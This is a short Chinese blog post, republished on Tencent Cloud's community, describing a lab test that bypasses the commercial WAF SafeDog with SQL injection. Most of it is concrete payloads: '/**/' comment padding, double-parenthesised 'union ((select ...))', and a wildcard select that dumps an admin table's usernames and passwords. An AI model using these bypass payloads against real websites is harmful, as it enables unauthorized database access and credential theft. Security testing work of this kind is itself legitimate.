前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >实战绕过某商业Waf(注入)

实战绕过某商业Waf(注入)

作者头像
用户1467662
发布2018-03-30 10:38:59
7730
发布2018-03-30 10:38:59
举报
文章被收录于专栏:农夫安全农夫安全

环境:apache+php+mysql(使用的phpstudy的集成环境)

最新版安全狗:刚从官网下载来的

注入点:

常规的and 1=1判断测试:

被拦截,用/**/代替空格:成功绕过

http://192.168.28.132/sql.php?id=1/**/and/**/1=1/**/

测试order by

可以看到安全狗并没有对order by 进行拦截

继续,union select

好吧,这个给拦截了====.union select分开来测试一下

union

select

Union select

可以看到只有他们两个在一起的时候才会被拦截,换个写法:union (select)

还是被拦截===一个括号解决不了的问题,那就两个吧:union ((select))

OK,狗没有拦截俩括号的,至于为什么没有信息,因为我这里没有对sql语句进行判断是否有语法错误,将字段数写上看看;

数字爆出来了

我这里有一张admin表,数据如下:

吧from加上吧:union ((select 1,2,3 from admin))

成功被拦截

继续修改:/**/union/**/((select/**/1,2,3/**/from/**/admin/**/))

试了半天====还好是过了===

爆数据了:/**/union/**/((select/**/username,2,3/**/from/**/admin/**/))

别闹===到这里我实在是绕不动了,在1,2,3这里只要出现字母就被拦截,

但是,我貌似看到了一个更直接的:

/**/union/**/((select/**/*/**/from/**/admin/**/)),直接他么的给他改成一个通配符,哈哈

拿到账号密码了.......

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2017-08-06,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 网络安全社区悦信安 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档